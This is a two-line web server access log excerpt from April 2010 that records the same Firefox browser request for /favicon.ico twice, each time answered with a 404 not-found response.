24.205.209.75 - - [19/Apr/2010:11:35:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
24.205.209.75 - - [19/Apr/2010:11:35:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
